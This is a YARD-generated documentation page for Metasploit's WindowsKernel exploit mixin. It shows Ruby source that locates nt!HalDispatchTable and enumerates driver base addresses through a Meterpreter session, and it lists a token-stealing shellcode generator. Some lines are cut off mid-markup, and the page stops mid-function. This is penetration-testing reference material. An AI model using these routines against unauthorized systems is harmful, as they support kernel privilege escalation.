<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Local::WindowsKernel
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script>
// Page-level globals for the YARD front-end (presumably consumed by
// ../../../js/app.js, loaded below): the documented object's path and the
// relative path back to the documentation root. Assigned explicitly on
// window rather than via implicit globals.
window.pathId = "Msf::Exploit::Local::WindowsKernel";
window.relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (W)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Local.html" title="Msf::Exploit::Local (class)">Local</a></span></span>
&raquo;
<span class="title">WindowsKernel</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Local::WindowsKernel
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../../Post/Windows/Error.html" title="Msf::Post::Windows::Error (module)">Post::Windows::Error</a></span>, <span class='object_link'><a href="../../PostMixin.html" title="Msf::PostMixin (module)">PostMixin</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/local/windows_kernel.rb</dd>
</dl>
</div>
<h2>Constant Summary</h2>
<h3 class="inherited">Constants included
from <span class='object_link'><a href="../../Post/Windows/Error.html" title="Msf::Post::Windows::Error (module)">Post::Windows::Error</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Post/Windows/Error.html#ABANDONED_WAIT_0-constant" title="Msf::Post::Windows::Error::ABANDONED_WAIT_0 (constant)">Post::Windows::Error::ABANDONED_WAIT_0</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ABANDONED_WAIT_63-constant" title="Msf::Post::Windows::Error::ABANDONED_WAIT_63 (constant)">Post::Windows::Error::ABANDONED_WAIT_63</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ABANDON_HIBERFILE-constant" title="Msf::Post::Windows::Error::ABANDON_HIBERFILE (constant)">Post::Windows::Error::ABANDON_HIBERFILE</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ABIOS_ERROR-constant" title="Msf::Post::Windows::Error::ABIOS_ERROR (constant)">Post::Windows::Error::ABIOS_ERROR</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_AUDIT_BY_POLICY-constant" title="Msf::Post::Windows::Error::ACCESS_AUDIT_BY_POLICY (constant)">Post::Windows::Error::ACCESS_AUDIT_BY_POLICY</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DENIED-constant" title="Msf::Post::Windows::Error::ACCESS_DENIED (constant)">Post::Windows::Error::ACCESS_DENIED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_BY_POLICY-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_BY_POLICY (constant)">Post::Windows::Error::ACCESS_DISABLED_BY_POLICY</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY (constant)">Post::Windows::Error::ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_WEBBLADE-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_WEBBLADE (constant)">Post::Windows::Error::ACCESS_DISABLED_WEBBLADE</a></span>, <span 
class='object_link'><a href="../../Post/Windows/Error.html#ACCESS_DISABLED_WEBBLADE_TAMPER-constant" title="Msf::Post::Windows::Error::ACCESS_DISABLED_WEBBLADE_TAMPER (constant)">Post::Windows::Error::ACCESS_DISABLED_WEBBLADE_TAMPER</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_DISABLED-constant" title="Msf::Post::Windows::Error::ACCOUNT_DISABLED (constant)">Post::Windows::Error::ACCOUNT_DISABLED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_EXPIRED-constant" title="Msf::Post::Windows::Error::ACCOUNT_EXPIRED (constant)">Post::Windows::Error::ACCOUNT_EXPIRED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_LOCKED_OUT-constant" title="Msf::Post::Windows::Error::ACCOUNT_LOCKED_OUT (constant)">Post::Windows::Error::ACCOUNT_LOCKED_OUT</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACCOUNT_RESTRICTION-constant" title="Msf::Post::Windows::Error::ACCOUNT_RESTRICTION (constant)">Post::Windows::Error::ACCOUNT_RESTRICTION</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACPI_ERROR-constant" title="Msf::Post::Windows::Error::ACPI_ERROR (constant)">Post::Windows::Error::ACPI_ERROR</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACTIVATION_COUNT_EXCEEDED-constant" title="Msf::Post::Windows::Error::ACTIVATION_COUNT_EXCEEDED (constant)">Post::Windows::Error::ACTIVATION_COUNT_EXCEEDED</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ACTIVE_CONNECTIONS-constant" title="Msf::Post::Windows::Error::ACTIVE_CONNECTIONS (constant)">Post::Windows::Error::ACTIVE_CONNECTIONS</a></span>, <span class='object_link'><a href="../../Post/Windows/Error.html#ADAP_HDW_ERR-constant" title="Msf::Post::Windows::Error::ADAP_HDW_ERR (constant)">Post::Windows::Error::ADAP_HDW_ERR</a></span>, <span class='object_link'><a 
href="../../Post/Windows/Error.html#ADDRESS_ALREADY_ASSOCIATED-constant" title="Msf::Post::Windows::Error::ADDRESS_ALREADY_ASSOCIATED (constant)">Post::Windows::
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../SessionCompatibility.html" title="Msf::SessionCompatibility (module)">SessionCompatibility</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../SessionCompatibility.html#passive-instance_method" title="Msf::SessionCompatibility#passive (method)">#passive</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_types-instance_method" title="Msf::SessionCompatibility#session_types (method)">#session_types</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="../../Module/HasActions.html" title="Msf::Module::HasActions (module)">Module::HasActions</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/HasActions.html#actions-instance_method" title="Msf::Module::HasActions#actions (method)">#actions</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#default_action-instance_method" title="Msf::Module::HasActions#default_action (method)">#default_action</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive-instance_method" title="Msf::Module::HasActions#passive (method)">#passive</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive_actions-instance_method" title="Msf::Module::HasActions#passive_actions (method)">#passive_actions</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#find_haldispatchtable-instance_method" title="#find_haldispatchtable (instance method)">#<strong>find_haldispatchtable</strong> &#x21d2; Integer<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Find the address of nt!HalDispatchTable.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#find_sys_base-instance_method" title="#find_sys_base (instance method)">#<strong>find_sys_base</strong>(drvname) &#x21d2; Array<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Find the load address for a device driver on the session.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#open_device-instance_method" title="#open_device (instance method)">#<strong>open_device</strong>(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0) &#x21d2; Integer<sup>?</sup> </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Open a device on a meterpreter session with a call to CreateFileA and return the handle.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#token_stealing_shellcode-instance_method" title="#token_stealing_shellcode (instance method)">#<strong>token_stealing_shellcode</strong>(target, backup_token = nil, arch = nil, append_ret = true) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate token stealing shellcode suitable for use when overwriting the HaliQuerySystemInformation pointer.</p>
</div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../SessionCompatibility.html" title="Msf::SessionCompatibility (module)">SessionCompatibility</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../SessionCompatibility.html#check_for_session_readiness-instance_method" title="Msf::SessionCompatibility#check_for_session_readiness (method)">#check_for_session_readiness</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#cleanup-instance_method" title="Msf::SessionCompatibility#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#command_names_for-instance_method" title="Msf::SessionCompatibility#command_names_for (method)">#command_names_for</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#compatible_sessions-instance_method" title="Msf::SessionCompatibility#compatible_sessions (method)">#compatible_sessions</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#meterpreter_session_incompatibility_reasons-instance_method" title="Msf::SessionCompatibility#meterpreter_session_incompatibility_reasons (method)">#meterpreter_session_incompatibility_reasons</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#passive%3F-instance_method" title="Msf::SessionCompatibility#passive? (method)">#passive?</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#post_commands-instance_method" title="Msf::SessionCompatibility#post_commands (method)">#post_commands</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session-instance_method" title="Msf::SessionCompatibility#session (method)">#session</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_changed%3F-instance_method" title="Msf::SessionCompatibility#session_changed? (method)">#session_changed?</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_compatible%3F-instance_method" title="Msf::SessionCompatibility#session_compatible? 
(method)">#session_compatible?</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_display_info-instance_method" title="Msf::SessionCompatibility#session_display_info (method)">#session_display_info</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#session_incompatibility_reasons-instance_method" title="Msf::SessionCompatibility#session_incompatibility_reasons (method)">#session_incompatibility_reasons</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#setup-instance_method" title="Msf::SessionCompatibility#setup (method)">#setup</a></span>, <span class='object_link'><a href="../../SessionCompatibility.html#sysinfo-instance_method" title="Msf::SessionCompatibility#sysinfo (method)">#sysinfo</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Post/Common.html" title="Msf::Post::Common (module)">Post::Common</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Post/Common.html#clear_screen-instance_method" title="Msf::Post::Common#clear_screen (method)">#clear_screen</a></span>, <span class='object_link'><a href="../../Post/Common.html#cmd_exec-instance_method" title="Msf::Post::Common#cmd_exec (method)">#cmd_exec</a></span>, <span class='object_link'><a href="../../Post/Common.html#cmd_exec_get_pid-instance_method" title="Msf::Post::Common#cmd_exec_get_pid (method)">#cmd_exec_get_pid</a></span>, <span class='object_link'><a href="../../Post/Common.html#cmd_exec_with_result-instance_method" title="Msf::Post::Common#cmd_exec_with_result (method)">#cmd_exec_with_result</a></span>, <span class='object_link'><a href="../../Post/Common.html#command_exists%3F-instance_method" title="Msf::Post::Common#command_exists? (method)">#command_exists?</a></span>, <span class='object_link'><a href="../../Post/Common.html#create_process-instance_method" title="Msf::Post::Common#create_process (method)">#create_process</a></span>, <span class='object_link'><a href="../../Post/Common.html#get_env-instance_method" title="Msf::Post::Common#get_env (method)">#get_env</a></span>, <span class='object_link'><a href="../../Post/Common.html#get_envs-instance_method" title="Msf::Post::Common#get_envs (method)">#get_envs</a></span>, <span class='object_link'><a href="../../Post/Common.html#peer-instance_method" title="Msf::Post::Common#peer (method)">#peer</a></span>, <span class='object_link'><a href="../../Post/Common.html#report_virtualization-instance_method" title="Msf::Post::Common#report_virtualization (method)">#report_virtualization</a></span>, <span class='object_link'><a href="../../Post/Common.html#rhost-instance_method" title="Msf::Post::Common#rhost (method)">#rhost</a></span>, <span class='object_link'><a href="../../Post/Common.html#rport-instance_method" title="Msf::Post::Common#rport (method)">#rport</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Module/HasActions.html" title="Msf::Module::HasActions (module)">Module::HasActions</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Module/HasActions.html#action-instance_method" title="Msf::Module::HasActions#action (method)">#action</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#find_action-instance_method" title="Msf::Module::HasActions#find_action (method)">#find_action</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive%3F-instance_method" title="Msf::Module::HasActions#passive? (method)">#passive?</a></span>, <span class='object_link'><a href="../../Module/HasActions.html#passive_action%3F-instance_method" title="Msf::Module::HasActions#passive_action? (method)">#passive_action?</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../Auxiliary/Report.html" title="Msf::Auxiliary::Report (module)">Auxiliary::Report</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../Auxiliary/Report.html#active_db%3F-instance_method" title="Msf::Auxiliary::Report#active_db? (method)">#active_db?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_cracked_credential-instance_method" title="Msf::Auxiliary::Report#create_cracked_credential (method)">#create_cracked_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential-instance_method" title="Msf::Auxiliary::Report#create_credential (method)">#create_credential</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_and_login-instance_method" title="Msf::Auxiliary::Report#create_credential_and_login (method)">#create_credential_and_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#create_credential_login-instance_method" title="Msf::Auxiliary::Report#create_credential_login (method)">#create_credential_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db-instance_method" title="Msf::Auxiliary::Report#db (method)">#db</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#db_warning_given%3F-instance_method" title="Msf::Auxiliary::Report#db_warning_given? (method)">#db_warning_given?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_client-instance_method" title="Msf::Auxiliary::Report#get_client (method)">#get_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#get_host-instance_method" title="Msf::Auxiliary::Report#get_host (method)">#get_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? 
(method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a 
href="../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_we
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="find_haldispatchtable-instance_method">
#<strong>find_haldispatchtable</strong> &#x21d2; <tt>Integer</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Find the address of nt!HalDispatchTable: the kernel image is loaded into the session's user-mode process, the HalDispatchTable export is resolved, and the result is rebased onto the kernel's actual load address as returned by find_sys_base.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>The address of nt!HalDispatchTable.</p>
</div>
</li>
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>If the address could not be found.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 31</span>
<span class='kw'>def</span> <span class='id identifier rubyid_find_haldispatchtable'>find_haldispatchtable</span>
<span class='id identifier rubyid_kernel_address'>kernel_address</span><span class='comma'>,</span> <span class='id identifier rubyid_kernel_name'>kernel_name</span> <span class='op'>=</span> <span class='id identifier rubyid_find_sys_base'>find_sys_base</span><span class='lparen'>(</span><span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_kernel_address'>kernel_address</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>||</span> <span class='id identifier rubyid_kernel_name'>kernel_name</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to find the address of the Windows kernel</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Kernel Base Address: 0x</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_kernel_address'>kernel_address</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_h_kernel'>h_kernel</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_kernel32'>kernel32</span><span class='period'>.</span><span class='const'>LoadLibraryExA</span><span class='lparen'>(</span><span class='id identifier rubyid_kernel_name'>kernel_name</span><span class='comma'>,</span> <span class='int'>0</span><span class='comma'>,</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to load </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_kernel_name'>kernel_name</span><span class='embexpr_end'>}</span><span class='tstring_content'> (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_h_kernel'>h_kernel</span> <span class='op'>=</span> <span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_kernel32'>kernel32</span><span class='period'>.</span><span class='const'>GetProcAddress</span><span class='lparen'>(</span><span class='id identifier rubyid_h_kernel'>h_kernel</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HalDispatchTable</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to retrieve the address of nt!HalDispatchTable (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>=</span> <span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>-=</span> <span class='id identifier rubyid_h_kernel'>h_kernel</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span> <span class='op'>+=</span> <span class='id identifier rubyid_kernel_address'>kernel_address</span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>HalDispatchTable Address: 0x</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='lparen'>(</span><span class='int'>16</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_hal_dispatch_table'>hal_dispatch_table</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="find_sys_base-instance_method">
#<strong>find_sys_base</strong>(drvname) &#x21d2; <tt>Array</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Find the load address for a device driver on the session.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>drvname</span>
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>The name of the driver module to find; if this value is nil, the kernel itself is located instead.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>An array containing the base address and the name of the located driver.</p>
</div>
</li>
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>If one of the railgun calls (EnumDeviceDrivers or GetDeviceDriverBaseNameA) fails; an error with the Win32 error code is printed first. Note that when no driver matches, the method does not actually return nil as this tag suggests: its final expression is the addresses.each loop, and Array#each returns its receiver, so the Array of enumerated base addresses is returned instead. Callers should verify that the result is an [address, name] pair whose second element is a String rather than relying on a nil check.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_find_sys_base'>find_sys_base</span><span class='lparen'>(</span><span class='id identifier rubyid_drvname'>drvname</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_util'>util</span><span class='period'>.</span><span class='id identifier rubyid_pointer_size'>pointer_size</span> <span class='op'>==</span> <span class='int'>8</span>
<span class='id identifier rubyid_ptr'>ptr</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Q&lt;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>else</span>
<span class='id identifier rubyid_ptr'>ptr</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>V</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_psapi'>psapi</span><span class='period'>.</span><span class='const'>EnumDeviceDrivers</span><span class='lparen'>(</span><span class='int'>0</span><span class='comma'>,</span> <span class='int'>0</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_util'>util</span><span class='period'>.</span><span class='id identifier rubyid_pointer_size'>pointer_size</span><span class='rparen'>)</span>
